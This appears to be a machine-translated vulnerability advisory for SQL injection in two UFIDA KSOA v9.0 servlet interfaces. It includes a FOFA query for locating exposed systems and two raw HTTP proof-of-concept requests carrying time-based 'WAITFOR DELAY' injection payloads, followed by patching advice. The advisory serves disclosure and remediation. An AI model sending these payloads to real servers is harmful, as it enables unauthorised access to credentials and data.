0x01 Introducción del producto
UFIDA KSOA es un producto de nueva generación desarrollado bajo la guía del concepto SOA, es una infraestructura de TI unificada lanzada de acuerdo con las necesidades de vanguardia de las empresas de distribución que permite que los sistemas de TI establecidos por las empresas de distribución en varios períodos se comuniquen ayudar a las empresas de distribución a proteger la inversión original en TI, simplificar la gestión de TI, mejorar la competitividad y garantizar la realización de los objetivos estratégicos generales y las actividades de innovación de la empresa.
Descripción general de la vulnerabilidad 0x02
Existen vulnerabilidades de inyección de sql en la interfaz /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet de UFIDA KSOA y en la interfaz /servlet/imagefield Los atacantes no autenticados pueden obtener información y credenciales confidenciales de la base de datos a través de esta vulnerabilidad y, eventualmente, pueden hacer que el servidor chocar.
0x03 rango de influencia
UFIDA KSOA v9.0
0x04 Entorno de recurrencia
FOFA: app="Yonyou-Tiempo y Espacio KSOA"
0x05 Reaparición de vulnerabilidad
PoC-1
GET /servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1%27;WAITFOR%20DELAY%20%270:0:10%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko)
Accept-Encoding: gzip, deflate
Connection: close
Retardo de inyección de construcción 10 segundos
autenticación de sqlmap
PoC-2
GET /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet?unitid=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko)
Accept-Encoding: gzip, deflate
Connection: close
autenticación de sqlmap
0x06 Sugerencia de reparación
plan provisional de mitigación
Limite las direcciones de origen de acceso y no abra el sistema a Internet a menos que sea necesario.
corrección de actualización
Actualice a una versión segura o aplique un parche.